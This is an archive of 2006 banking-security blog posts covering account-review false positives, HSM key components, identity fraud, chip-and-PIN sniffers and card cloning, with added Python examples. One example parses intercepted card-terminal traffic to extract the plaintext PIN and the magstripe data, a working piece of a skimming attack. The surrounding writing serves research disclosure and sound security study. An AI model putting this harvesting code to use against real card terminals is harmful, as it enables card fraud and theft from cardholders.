Posts filed under 'Banking security'

Sep 26, '06

After almost 3 years of problem-free banking in the UK I recently received the following letter from HSBC’s “Accounts Review Team”. It advised me that the HSBC group no longer wished to have me as a customer and that I had 30 days to move my banking to an establishment in no way connected to HSBC, before they would close my account. Confident that I had not indulged in any illegal activity recently, and concerned about their reasons for taking such action, I attempted several times to phone the number given in the letter, unsuccessfully reaching a “we are busy, please try again” recording each time. Visiting my home branch was not much more helpful as they claimed that the information had not been shared with them. I was advised to make a written complaint and was told that the branch had already referred the matter, as a number of customers had come in with similar letters.

After two written complaints and a phone call to customer services, a member of the “Team” finally contacted me. She enquired about a single international deposit into my account, which I then explained to be my study grant for the coming year. Upon this explanation I was told that the bank would not close my account, and I was given a vague explanation of them not expecting students to get large deposits. I found this strange, since it had not been a problem in previous years, and even stranger since my deposit had cleared into my account two days after the letter was sent. In terms of recent “suspicious” transactions, this left only two recent international deposits: one from my parents overseas and one from my savings, neither of which could be classified as large. I’m not an expert on complex behavioural analysis networks and fraud detection within banking systems, but would expect that study grants and family support are not unexpected for students? Moreover, rather than this being an isolated incident, it would seem that HSBC’s “account review” affected a number of people within our student community, some of whom might choose not to question the decision and may be left without bank accounts. This should raise questions about the effectiveness of their fraud detection system, or possibly a flawed behaviour model for a specific demographic.

My account is now restored, but I have still had no satisfactory explanation as to why the decision was made to close my account, nor do I know how this sorry affair will affect my future banking and credit rating. Would an attempt to transfer my account have caused HSBC’s negative opinion of me to spread to other institutions? A security mechanism that yields false positives or recommends a disproportionate reaction, e.g. closing an account based on a single unexpected transaction, should be seen as somewhat flawed. The end result is that the system runs on a guilty until proven innocent premise, with the onus for correcting marginal calls placed on the customer. Ultimately the bank will claim that these mechanisms are designed to protect the customer, but in the end randomly threatening to close my account does not make me feel any safer.

Sep 20, '06

Some years ago I wrote a subsection in my thesis (sec 8.4.3, p. 154), entitled “How Many Security Officers are Best?”, where I reviewed the various operating procedures I’d seen for Hardware Security Modules, and pondered why some people chose to use two separate parties to oversee a critical action and some chose to use three. Occasionally a single person is even deliberately entrusted with great power and responsibility, because there can be no question where to lay the blame if something goes wrong. So, “one, two, or three?”, I said to myself.

In the end I plumped for three… with some logic excerpted from my thesis below:

But three security officers does tighten security: a corrupt officer will be outnumbered, and deceiving two people in different locations simultaneously is next to impossible. The politics of negotiating a three-way collusion is also much harder: the two bad officers will have to agree on their perceptions of the third before approaching him. Forging agreement on character judgements when the stakes are high is very difficult. So while it may be unrealistic to have three people sitting in on a long-haul reconfiguration of the system, where the officers’ duties are short and clearly defined, three keyholders provide that extra protection.

Some time later, I mentioned the subject to Ross, and he berated me for my over-complicated logic. His general line of argument was along these lines: “The real threat for Security Officers is not that they blackmail, bribe or coerce one another, it’s that they help! Here, Bob, you go home early mate; I know you’ve got to pack for your business trip, and I’ll finish off installing the software on the key loading PC. That sort of thing. Having three key custodians makes ‘helping’ and such friendly tactics much harder - the bent officer must co-ordinate on two fronts.”

But recently my new job has exposed me to a number of real dual control and split knowledge systems. I was looking over some source code for a key loading HSM command in fact, and I spotted code that took a byte array of key material, and split it into three components each with odd parity. It generates two fresh totally random components with odd parity, and then XORs these onto the third. Hmmm, I thought, so the third component would contain the parity information of the original key, dangerous — a leakage of information preferentially to the third key component holder! But wrong… because the parity of the original key is known anyway in the case of a DES key… it’s always odd.

I chatted to our chief technical bod about this, and he casually dropped a bombshell — that shed new light on why three is best, an argument so simple and elegant that it must be true, yet faintly depressing to now believe that no-one agonised over the human psychology of the security officer numbers issue as I did. When keys are exchanged a Key Check Value (KCV) is calculated for each component, by encrypting a string of binary zeroes with the component value. Old-fashioned DES implementations only accepted keys with odd parity, so to calculate KCVs on these components, each must have odd parity as well as the final key itself. For the final key to retain odd parity from odd parity components, there must be an odd number of components (the parity of keys could be adjusted, but this takes more lines of code, and is less elegant than just tweaking a counter in the ‘for’ loop). Now the smallest odd integer greater than one is three. This is why the most valuable keys are exchanged in three components, and not in two!
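The parity argument in the two paragraphs above can be checked directly. The block below is an added example, not the HSM source code the post describes: it splits an odd-parity DES key into n components the way the post says the command does (n-1 fresh random odd-parity components, the last one chosen so the XOR recombines to the key) and reports the parity of each component. The KCV itself (DES encryption of zeroes under the component) is not computed here, since the point at issue is only whether the final component has the odd parity a strict DES implementation would demand.

```python
import os


def set_odd_parity(b: int) -> int:
    """Force odd parity on one byte by adjusting its low bit (the DES parity bit)."""
    b &= 0xFE
    if bin(b).count("1") % 2 == 0:
        b |= 0x01
    return b


def has_odd_parity(data: bytes) -> bool:
    """True when every byte has an odd number of 1 bits, as DES requires of a key."""
    return all(bin(b).count("1") % 2 == 1 for b in data)


def xor_bytes(*parts: bytes) -> bytes:
    """Byte-wise XOR of equal-length byte strings."""
    out = bytearray(len(parts[0]))
    for part in parts:
        for i, b in enumerate(part):
            out[i] ^= b
    return bytes(out)


def split_key(key: bytes, n: int) -> list[bytes]:
    """Split an odd-parity key into n components: n-1 fresh random odd-parity
    components, plus a final component chosen so that XORing all n gives the
    key back. Parity is never adjusted on the final component, which is
    exactly the behaviour the post describes."""
    if n < 2:
        raise ValueError("need at least two components")
    if not has_odd_parity(key):
        raise ValueError("DES keys are expected to have odd parity")
    fresh = [bytes(set_odd_parity(b) for b in os.urandom(len(key)))
             for _ in range(n - 1)]
    last = xor_bytes(key, *fresh)
    return fresh + [last]


def component_parity_report(key: bytes, n: int) -> dict:
    """Does the split recombine, and which components have odd parity?
    XOR of n odd-parity bytes has parity n mod 2, so the final component
    is odd-parity only when n is odd."""
    comps = split_key(key, n)
    return {
        "recombines": xor_bytes(*comps) == key,
        "parities": [has_odd_parity(c) for c in comps],
    }


if __name__ == "__main__":
    # Constructed 8-byte key with odd parity forced on every byte.
    demo_key = bytes(set_odd_parity(b) for b in range(0x10, 0x18))
    for n in (2, 3, 4, 5):
        print(n, component_parity_report(demo_key, n))
```

With two components the second one always comes out with even parity, so a parity-checking DES implementation cannot compute its KCV; with three, all three are odd-parity, as are any odd number. The leakage worried about in the previous paragraph is visible in the same arithmetic: the final component's parity is the XOR of the key's parity and the fresh components' parities, all of which are fixed at odd, so nothing the third custodian did not already know is revealed.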

So, the moral of the story for me is to make sure to apply Occam’s Razor more thoroughly when I try to deduce the logic behind the status quo, but I still think there are some interesting questions raised about how we share responsibility for critical actions. There still seems to me to be a very marked and qualitative difference in the dynamics of how three people interact versus two, whatever the situation: be it security officers entering keys, pilots flying an aircraft, or even a ménage à trois! Just like the magnitude of the difference between 2D and 3D space.

If one, two and three are all magical numbers, qualitatively different, are there any other qualitative boundaries higher in the cardinal numbers, and if so, what are they? In a security-critical process such as an election, can ten people adjudicate effectively in a way that thirty could not? Is there underlying logic or just mysticism behind the jury of twelve? Or, to take the jury example, and my own tendency to over-complicate, was it simply that in the first proper court room built back a few hundred years ago, there happened only to be space for twelve men on the benches on the right hand side!

Aug 25, '06

My book on Security Engineering is now available online for free download here.

I have two main reasons. First, I want to reach the widest possible audience, especially among poor students. Second, I am a pragmatic libertarian on free culture and free software issues; I believe many publishers (especially of music and software) are too defensive of copyright. I don’t expect to lose money by making this book available for free: more people will read it, and those of you who find it useful will hopefully buy a copy. After all, a proper book is half the size and weight of 300-odd sheets of laser-printed paper in a ring binder.

I’d been discussing this with my publishers for a while. They have been persuaded by the experience of authors like David MacKay, who found that putting his excellent book on coding theory online actually helped its sales. So book publishers are now learning that freedom and profit are not really in conflict; how long will it take the music industry?

Aug 8, '06

The National Consumer Council has published a report on “identity fraud” which is rather regrettable.

Identity fraud is not fraud, from the consumer’s viewpoint. If someone pretends to be me, borrows 10K from the Derbyshire Building Society and vanishes, it’s the building society that’s the victim, not me. If Experian then says I’m a loan defaulter when I’m not, that’s libel. Suing for libel may be expensive, but the Information Commissioner has announced his willingness to issue enforcement notices against the credit agencies in such circumstances. The NCC should have advertised this fact and encouraged people to go to him.

“Identity fraud” is an objectionable concept, an attempt by the banks to dump some liability. The Home Office egg them on because they think that rebadging credit-card fraud as “identity fraud” will help sell identity cards. But it’s a bad show when consumer organisations collude with an attempt to make consumers the victims of bankers’ and credit reference agencies’ negligence.

Jul 26, '06

Markus points us to a story on card fraud by German TV reporter Sabine Wolf, who reported some of our recent work on how cards get cloned. She reports a number of cases in which German holidaymakers had cards cloned in Italy. In one case, a sniffer in a chip and PIN terminal at a skilift in Livigno sent holidaymakers’ card and PIN details by SMS to Romania. These devices, which apparently first appeared in Hungary in 2003, are now becoming widespread in Europe; one model sits between a card reader and the retail terminal. (I have always refused to use my chip card at stores such as Tesco and B&Q where they want to swipe your card at the checkout terminal and have you enter your PIN at a separate PIN pad - this is particularly vulnerable to such sniffing attacks.)

According to Hungarian police, the crooks bribe the terminal maintenance technicians, or send people round stores pretending to be technicians; the Bavarian police currently have a case in which 150 German cardholders lost 600,000 Euro; the Guardia di Finanza in Genoa have a case in which they’ve recovered thousands of SMSs from phone company computers containing card data; a prosecutor in Bolzano believes that crooks hide in supermarkets overnight and wire up the terminals; and there are also cases from Sweden, France, and Britain. Customers tend to get blamed unless there’s such a large batch of similar frauds that the bank can’t fail to observe the pattern. (This liability algorithm gives the bankers every incentive not to look too hard.)

In Hungary, banks now routinely confirm all card transactions to their customers by SMS. Maybe that’s what banks here will be doing in a year or two (Barclays will already SMS you if you make an online payment to a new payee). It’s not ideal though as it keeps pushing liability to the customer. I suspect it might take an EU directive to push the liability firmly back on the banks, along the lines of the US Federal Reserve’s Regulation E.

Jul 22, '06

Our beloved government is once again Taking Powers in the fight against computer crime. The Home Office proposes to create cyber-asbos that would enable the police to ban suspects from using such dangerous tools as computers and bank accounts. This would be done in a civil court against a low evidence standard; there are squeals from the usual suspects such as zdnet.

The Home Office proposals will also undermine existing data protection law; for example by allowing the banks to process sensitive data obtained from the public sector (medical record privacy, anyone?) and ‘dispelling misconceptions about consent’. I suppose some might welcome the proposed extension of ASBOs to companies. Thus, a company with repeated convictions for antitrust violations might be saddled with a list of harm-prevention conditions, for example against designing proprietary server-side protocols or destroying emails. I wonder what sort of responses the computer industry will make to this consultation :-)

A cynic might point out that the ‘new powers’ seem in inverse proportion to the ability, or will, to use the existing ones. Ever since the South Sea Bubble in the 18th century, Britain has been notoriously lax in prosecuting bent bankers; city folk are now outraged when a Texas court dares to move from talk to action. Or take spam; although it’s now illegal to send unsolicited commercial emails to individuals in the UK, complaints don’t seem to result in action. Now trade and industry minister ‘Enver’ Hodge explains this is because there’s a loophole - it’s not illegal to spam businesses. So rather than prosecuting a spammer for spamming individuals, our beloved government will grab a headline or two by blocking this loophole. I don’t suppose Enver ever stopped to wonder how many spam runs are so well managed as to not send a single item to a single private email address - cheap headlines are more attractive than expensive, messy implementation.

This pattern of behaviour - taking new powers rather than using the existing ones - is getting too well entrenched. In cyberspace we don’t have law enforcement any more - we have the illusion of law enforcement.

Jul 20, '06

Yesterday my wife received through the post a pre-approved unsolicited gold mastercard with a credit limit of over a thousand pounds. The issuer was Debenhams and the rationale was that she has a store card anyway - if she doesn’t want to use the credit card she is invited to cut the credit card in half and throw it away. (Although US banks do this all the time and UK banks aren’t supposed to, I’ll leave it to the lawyers whether their marketing tactics test the limits of banking regulation.)

My point is this: the average customer has no idea how to ‘cut up’ a card now that it’s got a chip in it. Bisecting the plastic using scissors leaves the chip functional, so someone who fishes it out of the trash might use a yescard to clone it, even if they don’t know the PIN. (Of course the PIN mailer might be in the same bin.)

Here at the Lab we do have access to the means to destroy chips (HNO3, HF) but you really don’t want that stuff at home. Putting 240V through it will stop it working - but as this melts the bonding wires, an able attacker might depackage and rebond the chip.

My own suggestion would be to bisect the whole chip package using a pair of tin snips. If you don’t have those in your toolbox a hacksaw should do. This isn’t foolproof as there exist labs that can retrieve data from chip fragments, but it’s probably good enough to keep out the hackers.

It does seem a bit off, though, that card issuers now put people to the trouble of devising a means of the secure disposal of electronic waste, when consumers mostly have neither the knowledge nor the tools to do so properly.

Jun 30, '06

Sky News had a piece on the Harvey case, which might be the first reported UK instance of chip-to-chip copying. The text is here and the video here.

Jun 12, '06

The 12:30 ITN news on ITV1 today featured a segment (video) on Chip and PIN, and should also be shown at 19:00 and 22:30. It included an interview with Ross Anderson and some shots of me presenting our Chip and PIN interceptor. The demonstration was similar to the one shown on German TV but this time we went all the way, borrowing a magstripe writer and producing a fake card. This was used by the reporter to successfully withdraw money from an ATM (from his own account).

More details on how the device actually works are on our interceptor page. The key vulnerabilities present in the UK Chip and PIN cards we have tested, which the interceptor relies on, are:

  • The entered PIN is sent from the terminal to the card in unencrypted form
  • It is still possible to use magstripe-only cards to withdraw cash, with the same PIN used in shops
  • All the details necessary to create a valid magstripe are also present on the chip

This means that a crook could insert a miniaturised version of the interceptor into the card slot of a Chip and PIN terminal, without interfering with the tamper detection. The details it collects include the PIN and enough information to create a valid magstripe. The fake card can then be used in ATMs which are willing to accept cards which, from their perspective, have a damaged chip — known as “fallback”. Some ATMs might not even be able to read the chip at all, particularly ones abroad.

The fact that the chip also includes the magstripe details is not strictly necessary, since a skimmer could also read this, but the design of some Chip and PIN terminals, which only cover the chip, makes this difficult. One of the complaints against the terminals used in the Shell fraud was that they make it impossible to read the chip without reading the magstripe too. This led to suggestions that customers should not use such terminals, or even that they wipe their card’s magstripe to prevent skimmers from reading it.

While it is possible that the Shell fraudsters did read the magstripe, wiping it will not be a defence against them reading the communication between terminal and chip, which includes all the needed details. Even the CVV1, the code used to verify that a magstripe is valid, is on the chip (but not the CVV2, which is the 3 digit code printed on the back, used by ecommerce). This was presumably a backwards-compatibility measure, as was magstripe fallback. As shown by countless examples before, such features are frequently the source of security flaws.
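To make concrete what an interceptor in the card slot actually gets from the three weaknesses listed above, here is an added example (not the interceptor's own software, and not code from the original post) that walks a constructed card-terminal exchange: a READ RECORD response carrying Track 2 Equivalent Data (EMV tag 57) and a VERIFY command carrying the plaintext offline PIN block. Every byte of the trace is made up for illustration: the PAN, expiry, service code, discretionary data and cardholder name are not real, and the lengths and tag encodings follow the EMV record layout as the author of this example understands it.

```python
from typing import Optional

# Constructed trace; all values are invented. "C" = command to the card,
# "R" = response from the card (status words 90 00 appended).
TRACE = [
    # READ RECORD (SFI 1, record 1): the record template (tag 70) holds
    # Track 2 Equivalent Data (tag 57) and Cardholder Name (tag 5F20).
    ("C", "00B2010C00"),
    ("R", "701C57125413123456789012D091220100001234567F5F2005444F452F4A9000"),
    # VERIFY with P2 = 80: the plaintext PIN block goes to the card in clear.
    ("C", "0020008008241234FFFFFFFFFF"),
    ("R", "9000"),
]


def parse_tlv(data: bytes) -> dict:
    """Minimal BER-TLV walker for EMV records: multi-byte tags, short and
    long-form lengths; constructed tags are descended into and flattened."""
    found = {}
    i = 0
    while i < len(data):
        first = data[i]
        tag = first
        i += 1
        if first & 0x1F == 0x1F:            # further tag bytes follow
            while True:
                tag = (tag << 8) | data[i]
                i += 1
                if data[i - 1] & 0x80 == 0:
                    break
        length = data[i]
        i += 1
        if length & 0x80:                   # long form: count of length bytes
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:                    # constructed: recurse into template
            found.update(parse_tlv(value))
        else:
            found[tag] = value
    return found


def parse_track2(track2: bytes) -> dict:
    """Track 2 Equivalent Data is packed BCD: PAN, 'D' separator, YYMM expiry,
    3-digit service code, issuer discretionary data, F-padded to a whole byte.
    On a real card the CVV1 the post mentions lives in the discretionary data."""
    digits = track2.hex().upper().rstrip("F")
    pan, rest = digits.split("D", 1)
    return {"pan": pan, "expiry": rest[:4],
            "service_code": rest[4:7], "discretionary": rest[7:]}


def pin_from_verify(capdu: bytes) -> Optional[str]:
    """Recover the PIN from a VERIFY command carrying a plaintext PIN block:
    control nibble 2, PIN-length nibble, PIN digits, then F padding.
    Returns None for anything else (including P2 = 88, enciphered PIN)."""
    if capdu[:4] != bytes.fromhex("00200080") or capdu[4] != 8:
        return None
    nibbles = capdu[5:13].hex().upper()
    if nibbles[0] != "2":
        return None
    pin_len = int(nibbles[1], 16)
    return nibbles[2:2 + pin_len]


def harvest(trace) -> dict:
    """Everything an interceptor in the card slot learns from the exchange."""
    result = {}
    for direction, hexdata in trace:
        raw = bytes.fromhex(hexdata)
        if direction == "C":
            pin = pin_from_verify(raw)
            if pin:
                result["pin"] = pin
        else:
            body, sw = raw[:-2], raw[-2:]
            if sw == b"\x90\x00" and body:
                tlvs = parse_tlv(body)
                if 0x57 in tlvs:
                    result["track2"] = parse_track2(tlvs[0x57])
                if 0x5F20 in tlvs:
                    result["cardholder"] = tlvs[0x5F20].decode("ascii")
    return result


if __name__ == "__main__":
    print(harvest(TRACE))
```

The harvested PAN, expiry, service code and discretionary data are the fields a magstripe writer needs, and the PIN arrives in the same trace, which is why wiping the stripe on the card does nothing against this attack: the chip hands out the same data. A service code beginning with 2 marks the card as chip-capable, so a stripe built from it would only be accepted by a terminal or ATM that falls back to magstripe.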

Jun 6, '06

We’ve got emails from several people complaining that after their card had been stolen, someone did a fraudulent transaction on it — without knowing the PIN. In some cases the victim had never used the card in a retail transaction and didn’t know the PIN.

An article in yesterday’s Daily Mail hints at how. In technical language, you read the card, which gives you everything except the MAC key. You now write this data to a fresh card, for which you know the PIN. If this clone card is used in an offline terminal, the transaction will go through and the log will show the PIN was correctly entered. The moral, I suppose, is that customers in dispute with their banks should demand that the banks disclose the MAC key and show that the MAC on the transaction log was correct. Whether their systems support this is of course another story.
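The attack and the suggested defence in the paragraph above can be simulated in a few dozen lines. This is an added example, not code from the post or from any bank's system: a genuine card holds a MAC key that never leaves the chip, a clone carries every other field plus a PIN the attacker chose, an offline terminal trusts the card's own PIN verdict, and the issuer, who alone holds the real key, recomputes the MAC over the logged transaction. HMAC-SHA256 stands in for the DES-based MAC of the real protocol, and the message layout, counter and nonce are simplifications chosen for the example.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


def transaction_mac(key: bytes, pan: str, amount: int, counter: int, nonce: bytes) -> bytes:
    """MAC over the transaction details. HMAC-SHA256 truncated to 8 bytes stands
    in for the DES MAC of the real protocol; the argument is the same."""
    msg = f"{pan}|{amount}|{counter}|{nonce.hex()}".encode()
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


@dataclass
class Card:
    pan: str
    pin: str
    mac_key: bytes      # on a genuine card this never leaves the chip
    counter: int = 0    # transaction counter, incremented per cryptogram

    def verify_pin(self, candidate: str) -> bool:
        return hmac.compare_digest(candidate.encode(), self.pin.encode())

    def cryptogram(self, amount: int, nonce: bytes) -> tuple:
        self.counter += 1
        return self.counter, transaction_mac(self.mac_key, self.pan,
                                             amount, self.counter, nonce)


def clone_card(victim: Card, pin_of_choice: str) -> Card:
    """The attacker reads the public card data but not the MAC key, so the
    clone carries a made-up key and whatever PIN the attacker chose."""
    return Card(pan=victim.pan, pin=pin_of_choice, mac_key=os.urandom(16))


def offline_terminal(card: Card, pin_entered: str, amount: int):
    """An offline terminal asks the card to check the PIN and trusts its answer.
    It cannot verify the MAC because it does not hold the key, so it simply
    logs whatever the card produced. Returns None when the card declines."""
    if not card.verify_pin(pin_entered):
        return None
    nonce = os.urandom(4)
    counter, mac = card.cryptogram(amount, nonce)
    return {"pan": card.pan, "amount": amount, "counter": counter,
            "nonce": nonce, "mac": mac, "pin_verified": True}


def issuer_mac_check(entry: dict, issuer_key: bytes) -> bool:
    """What the bank should do in a dispute: recompute the MAC on the logged
    transaction with the real key and compare."""
    expected = transaction_mac(issuer_key, entry["pan"], entry["amount"],
                               entry["counter"], entry["nonce"])
    return hmac.compare_digest(expected, entry["mac"])


def demo(issuer_key: bytes) -> dict:
    """Genuine card and clone both pass the offline PIN check; only the genuine
    transaction survives the issuer's MAC check."""
    victim = Card(pan="5413123456789012", pin="4321", mac_key=issuer_key)
    clone = clone_card(victim, pin_of_choice="0000")
    genuine = offline_terminal(victim, "4321", 5000)
    fraud = offline_terminal(clone, "0000", 5000)
    return {
        "genuine_log_says_pin_ok": genuine["pin_verified"],
        "fraud_log_says_pin_ok": fraud["pin_verified"],
        "genuine_mac_valid": issuer_mac_check(genuine, issuer_key),
        "fraud_mac_valid": issuer_mac_check(fraud, issuer_key),
    }


if __name__ == "__main__":
    print(demo(os.urandom(16)))
```

Both log entries say “PIN verified”, which is all the offline terminal can record; only the MAC, checked against the issuer's copy of the key, distinguishes the clone. That is the disclosure the last sentence of the post asks customers to demand.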
